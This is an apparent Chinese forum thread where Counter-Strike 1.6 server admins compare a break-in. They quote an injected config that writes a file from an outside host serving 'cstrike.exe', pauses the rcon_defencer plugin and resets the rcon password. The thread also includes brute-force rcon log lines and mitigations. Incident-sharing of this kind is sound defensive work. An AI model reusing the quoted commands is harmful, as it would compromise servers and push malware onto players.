我也遇到了同样的问题. 所有的服务端界面都有下面图这种爆破.不断的换IP和枚聚密码! 用的是5758的服务端!metmod及amxx还有SXE和双协议补丁的版本全都是一致的!
除了比赛服没有被写入楼主所提到的文件外,其他服都被写入了文件.
比赛服加载的插件很少.没有被写入. 其他混战服和死亡服都被写入.但只有2个服写入的文件被执行,OP密码被改.这2个服是租给别人的.余下的自己的4个服被写入,但文件没有被执行,OP也没被改掉.一共是7个服.
大家都列出环境,对比一下是哪个插件有后门.还有是文件是从哪写入的!
cstrike\addons\metamod\exec.cfg
cstrike\addons\amxmodx\configs\maps文件夹
还有motd.txt
除了motd.txt外,其他文件的内容均相同.
内容如下:motdfile motd.txt
motd_write http://zeal1209.no-ip.org/cstrike.exe
amxx pause rcon_defencer.amxx
rcon_password zhenya
被写入并执行的插件列表:; AMX Mod X 插件调用
; 不用的插件请在前面加上 ;
; 管理员 管理模式类 —— 只能选择一种
admin.amxx ; 管理员 管理模式类 (所有的管理员相关的插件都需要此插件)
;admin_sql.amxx debug ; 管理员 管理模式类 - SQL 版本 (若使用此模式请注释掉 admin.amxx)
; 系统基本类
admincmd.amxx ; 基本的管理员控制台管理命令
adminhelp.amxx ; 管理员控制台命令帮助信息
;adminslots.amxx debug ; 管理员预留通道
multilingual.amxx ; 多种语言管理
; 菜单/目录类
menufront.amxx ; 提供管理员菜单的格式
cmdmenu.amxx ; 命令菜单(声音播放等许多设置)
plmenu.amxx ; 玩家菜单 (踢人, 封禁玩家, 客户端命令等.)
telemenu.amxx ; 传送菜单 【可以将某一玩家传送到指定地点】(需要开启娱乐模块)
mapsmenu.amxx ; 地图菜单 (投票更换地图, 直接更换地图)
pluginmenu.amxx ; 菜单命令/通过调用插件设置游戏参数
; 聊天\信息类
adminchat.amxx ; 在控制台里聊天的命令
antiflood.amxx ; 阻止客户端在服务器上疯狂发信息(呵呵……就是灌水!)
scrollmsg.amxx ; 屏幕下方滚动字幕
imessage.amxx ; 屏幕中央彩色字体
adminvote.amxx ; 投票菜单
admin_in_op_vip.amxx ; 显示在线OP和VIP
admin_godmode.amxx ;
admin_heal.amxx ;
admin_fire ;
; 地图类
nextmap.amxx ; 显示下一张地图的插件
;mapchooser.amxx ; 在下一张地图开始前自动发起投票地图决定下一张地图的插件
timeleft.amxx ; 显示当前地图剩余时间的插件
; 配置类
pausecfg.amxx ; 通过菜单来暂停/恢复插件的使用 【管理功能】
statscfg.amxx ; 通过菜单来设置管理数据统计插件【管理功能】
; 允许使用 AMX Mod 插件
;amxmod_compat.amxx ; AMX Mod 向后兼容层
; 反恐精英类
restmenu.amxx ; 禁用武器功能
csstats.amxx ; csstats 排名
statsx.amxx ; 在人物死亡和一个回合结束的时候显示当前的统计信息 (需要开启 CSX 模块!)
miscstats.amxx ; 为反恐精英收集各种事件的信息。
stats_logging.amxx ; 武器数据统计记录 (需要开启 CSX 模块!)
; 自定义插件 - 第三方插件请加在下面
; 添加方法:
; 请将第三方插件的名字带上后缀名加在下面。例如:123456.amxx
cnname.amxx ;中文名
;addmaster.amxx
;zfMenu.amxx
;zf168-27015.amxx
;zf168-27016.amxx
zf168-27017-1.amxx
;zf168-27018.amxx
;zf168-27019.amxx
;zf168-27020.amxx
AFK_C4.amxx ; C4携带者不动掉出炸药包
First_Shot_Reward.amxx ; 杀敌前三奖励
flashfix.amxx ; 闪光BUG修复
hpk.amxx ; 高ping玩家自动踢出
;nosxeta.amxx ; NOSXE不能使用AWP
say_menu.amxx ; 按Y键后输入menu可以打开管理员菜单或玩家菜单
votemenu.amxx ; 投票踢出玩家和投票封禁玩家
Map_Spawns_Editor.amxx ;地图出生点位
;team_objectives.amxx ;任务失败处罚
MONEY16000.amxx
sxei_plus.amxx
下面是被写入,但没有被执行的插件列表:; AMX Mod X 插件调用
; 不用的插件请在前面加上 ;
; 管理员 管理模式类 —— 只能选择一种
;admin.amxx ; 管理员 管理模式类 (所有的管理员相关的插件都需要此插件)
admin_sql.amxx debug ; 管理员 管理模式类 - SQL 版本 (若使用此模式请注释掉 admin.amxx)
; 系统基本类
admincmd.amxx ; 基本的管理员控制台管理命令
adminhelp.amxx ; 管理员控制台命令帮助信息
;adminslots.amxx debug ; 管理员预留通道
multilingual.amxx ; 多种语言管理
; 菜单/目录类
menufront.amxx ; 提供管理员菜单的格式
cmdmenu.amxx ; 命令菜单(声音播放等许多设置)
plmenu.amxx ; 玩家菜单 (踢人, 封禁玩家, 客户端命令等.)
telemenu.amxx ; 传送菜单 【可以将某一玩家传送到指定地点】(需要开启娱乐模块)
mapsmenu.amxx ; 地图菜单 (投票更换地图, 直接更换地图)
pluginmenu.amxx ; 菜单命令/通过调用插件设置游戏参数
; 聊天\信息类
adminchat.amxx ; 在控制台里聊天的命令
antiflood.amxx ; 阻止客户端在服务器上疯狂发信息(呵呵……就是灌水!)
scrollmsg.amxx ; 屏幕下方滚动字幕
imessage.amxx ; 屏幕中央彩色字体
adminvote.amxx ; 投票菜单
admin_in_op_vip.amxx ; 显示在线OP和VIP
; 地图类
nextmap.amxx ; 显示下一张地图的插件
mapchooser.amxx ; 在下一张地图开始前自动发起投票地图决定下一张地图的插件
timeleft.amxx ; 显示当前地图剩余时间的插件
; 配置类
pausecfg.amxx ; 通过菜单来暂停/恢复插件的使用 【管理功能】
statscfg.amxx ; 通过菜单来设置管理数据统计插件【管理功能】
; 允许使用 AMX Mod 插件
;amxmod_compat.amxx ; AMX Mod 向后兼容层
; 反恐精英类
restmenu.amxx ; 禁用武器功能
csstats.amxx ; csstats 排名
statsx.amxx ; 在人物死亡和一个回合结束的时候显示当前的统计信息 (需要开启 CSX 模块!)
miscstats.amxx ; 为反恐精英收集各种事件的信息。
stats_logging.amxx ; 武器数据统计记录 (需要开启 CSX 模块!)
; 自定义插件 - 第三方插件请加在下面
; 添加方法:
; 请将第三方插件的名字带上后缀名加在下面。例如:123456.amxx
cnname.amxx ;中文名
;addmaster.amxx
;zfMenu.amxx
;zf168-27015.amxx
;zf168-27016.amxx
;zf168-27017.amxx
zf168-27018-1.amxx
;zf168-27019-1.amxx
;zf168-27020.amxx
AFK_C4.amxx ; C4携带者不动掉出炸药包
First_Shot_Reward.amxx ; 杀敌前三奖励
flashfix.amxx ; 闪光BUG修复
hpk.amxx ; 高ping玩家自动踢出
;nosxeta.amxx ; NOSXE不能使用AWP
say_menu.amxx ; 按Y键后输入menu可以打开管理员菜单或玩家菜单
votemenu.amxx ; 投票踢出玩家和投票封禁玩家
Map_Spawns_Editor.amxx ;地图出生点位
team_objectives.amxx ;任务失败处罚
MONEY16000.amxx
sxei_plus.amxx
比赛服,没有被写入的插件列表; AMX Mod X 插件调用
; 不用的插件请在前面加上 ;
; 管理员 管理模式类 —— 只能选择一种
admin.amxx ; 管理员 管理模式类 (所有的管理员相关的插件都需要此插件)
;admin_sql.amxx debug ; 管理员 管理模式类 - SQL 版本 (若使用此模式请注释掉 admin.amxx)
; 系统基本类
admincmd.amxx ; 基本的管理员控制台管理命令
;adminhelp.amxx ; 管理员控制台命令帮助信息
;adminslots.amxx debug ; 管理员预留通道
;multilingual.amxx ; 多种语言管理
; 菜单/目录类
menufront.amxx ; 提供管理员菜单的格式
cmdmenu.amxx ; 命令菜单(声音播放等许多设置)
plmenu.amxx ; 玩家菜单 (踢人, 封禁玩家, 客户端命令等.)
;telemenu.amxx ; 传送菜单 【可以将某一玩家传送到指定地点】(需要开启娱乐模块)
mapsmenu.amxx ; 地图菜单 (投票更换地图, 直接更换地图)
;pluginmenu.amxx ; 菜单命令/通过调用插件设置游戏参数
; 聊天\信息类
adminchat.amxx ; 在控制台里聊天的命令
antiflood.amxx ; 阻止客户端在服务器上疯狂发信息(呵呵……就是灌水!)
;scrollmsg.amxx ; 屏幕下方滚动字幕
;imessage.amxx ; 屏幕中央彩色字体
;adminvote.amxx ; 投票菜单
;admin_in_op_vip.amxx ; 显示在线OP和VIP
; 地图类
;nextmap.amxx ; 显示下一张地图的插件
;mapchooser.amxx ; 在下一张地图开始前自动发起投票地图决定下一张地图的插件
;timeleft.amxx ; 显示当前地图剩余时间的插件
; 配置类
pausecfg.amxx ; 通过菜单来暂停/恢复插件的使用 【管理功能】
;statscfg.amxx ; 通过菜单来设置管理数据统计插件【管理功能】
; 允许使用 AMX Mod 插件
;amxmod_compat.amxx ; AMX Mod 向后兼容层
; 反恐精英类
restmenu.amxx ; 禁用武器功能
;csstats.amxx ; csstats 排名
;statsx.amxx ; 在人物死亡和一个回合结束的时候显示当前的统计信息 (需要开启 CSX 模块!)
;miscstats.amxx ; 为反恐精英收集各种事件的信息。
;stats_logging.amxx ; 武器数据统计记录 (需要开启 CSX 模块!)
; 自定义插件 - 第三方插件请加在下面
; 添加方法:
; 请将第三方插件的名字带上后缀名加在下面。例如:123456.amxx
cnname.amxx ;中文名
flashfix.amxx ; 闪光BUG修复
say_menu.amxx ; 按Y键后输入menu可以打开管理员菜单或玩家菜单
amx_match_deluxe.amxx
amx_money_r3.amxx
teamtalk.amxx
老毛子 这么坏
:o这。。。。。。好吧关注下。
暴力破解的吧!
现在能加插件了,sound.amxx 从maps文件夹中的plguinsxx.ini来启用的
这插件会篡改地服玩家的userconfig:@
我的服务器也遭到了这个入侵 求解决方案
是不是METAMOD 有问题昨天 没开AMX插件居然 也植入MAP文件夹了。 有高手出台解决方法么 ?
本帖最后由 wangningyu 于 2013-6-29 00:37 编辑
测试过啦,5956才会这样,而5758就不会了,在connect就提示fake client拦截了
另外忘记说了,这个工具GG一下就找得到,跟俄佬没多大关系~~
h.t.t.p://=====31.====200.====239.====201
(自己去掉等于号吧!)
用GOOGLE翻译成英文,用百度再把英文翻译成中文,才大致了解了,很黄很暴力~~
如果你在这里,那就意味着你不坐在地上,试图解决你在公告的污秽。值得称赞的。此服务器将不工作,也许你将能够洪水也。然而,如果你试图洪水(DDoS)这个页面,你不去,你就越有可能只是禁止系统。所以不要被愚弄。
联系:ICQ的646459042,尤金
这个在几个礼拜前,大概抓到几W个俄罗斯和乌克兰还有美国的IP来攻击我的服,
我的服排名世界400左右,后来有一天进我服的玩家客户端被植入自动进服cfg。
在打开CS客户端的同时直接转到俄罗斯的3个僵尸服,
经过一个多星期的研究,写下研究结果,分析给大家,
5758服务端的swds.dll有上传的漏洞,具体利用方法不便透露,
这个上传会在config/maps目录下多一些配置文件和xxxx.amxx等
打上最新的swds.dll的SP2补丁即可
附件包括Linux和Windows的补丁
(附件较大上传不方便)
我已放到我的论坛上了
没有点通币的可以访问
http://bbs.51537.com/read-htm-tid-7810.html
另外5956和5758被hl_brute多次、大量、洪水般的嗅探服务器的OP密码可以使用
anti_hlbrute.amxx 最新版本是1.2版
如果5956被XBrute多次、大量、洪水般的嗅探服务器OP密码的话,在DP没有更新的情况下,还是使用5758服务端打上补丁吧,加上HL_BRUTE1.2基本能安详许多
L 06/29/2013 - 02:54:44: Bad Rcon: "rcon 1323454336 "06012002" echo XBrute by ZeaL" from "109.110.58.86:27006"
L 06/29/2013 - 02:54:55: Bad Rcon: "rcon 1064897828 "40102" echo XBrute by ZeaL" from "95.81.33.180:27005"
L 06/29/2013 - 02:54:56: Bad Rcon: "rcon 293450848 "412002" echo XBrute by ZeaL" from "37.212.207.80:27005"
L 06/29/2013 - 02:55:01: Bad Rcon: "rcon 165748071 "04012" echo XBrute by ZeaL" from "5.166.185.101:27005"
L 06/29/2013 - 02:55:07: Bad Rcon: "rcon 2294079100 "4012" echo XBrute by ZeaL" from "95.58.51.67:21851"
L 06/29/2013 - 02:55:10: Bad Rcon: "rcon 89383525 "0412" echo XBrute by ZeaL" from "92.47.2.200:10523"
L 06/29/2013 - 02:55:13: Bad Rcon: "rcon 2057423911 "412" echo XBrute by ZeaL" from "176.8.108.80:27006"
L 06/29/2013 - 02:55:26: Bad Rcon: "rcon 286229498 "25122001" echo XBrute by ZeaL" from "195.162.81.150:29266"
L 06/29/2013 - 02:55:28: Bad Rcon: "rcon 1150118152 "05012002" echo XBrute by ZeaL" from "188.134.44.31:27005"
L 06/29/2013 - 02:55:29: Bad Rcon: "rcon 960333148 "25121" echo XBrute by ZeaL" from "89.45.103.22:27006"
L 06/29/2013 - 02:55:35: Bad Rcon: "rcon 713236419 "0512002" echo XBrute by ZeaL" from "37.229.67.105:27005"
L 06/29/2013 - 02:55:56: Bad Rcon: "rcon 2054130206 "05012" echo XBrute by ZeaL" from "95.86.231.3:27005"
L 06/29/2013 - 02:56:03: Bad Rcon: "rcon 835981102 "0512" echo XBrute by ZeaL" from "178.234.234.113:28729"
L 06/29/2013 - 02:56:11: Bad Rcon: "rcon 33187532 "512" echo XBrute by ZeaL" from "109.120.36.5:27005"
L 06/29/2013 - 02:56:14: Bad Rcon: "rcon 1578989710 "6012002" echo XBrute by ZeaL" from "91.211.215.162:27005"
L 06/29/2013 - 02:56:15: Bad Rcon: "rcon 1943081664 "0612002" echo XBrute by ZeaL" from "188.0.148.165:27005"
这个XBrute的5956在没有升级DP的情况下是暂时没有办法和谐的。
附
SERVER.CFG里的配置,
sv_rcon_minfailures 1
// 允许输入OP密码 错误次数下限
// 达到下限则封禁对方的IP
sv_rcon_maxfailures 1
// 允许输入OP密码 错误次数上限
// 达到上限则封禁对方的IP
sv_rcon_minfailuretime 604800
// seconds for next try (1-3600)
sv_rcon_banpenalty 0
// 封禁的时限 单位 分钟
// 0=永久
对它无效
最新服务端漏洞俄罗斯链接
http://c-s.net.ua/forum/topic37395.html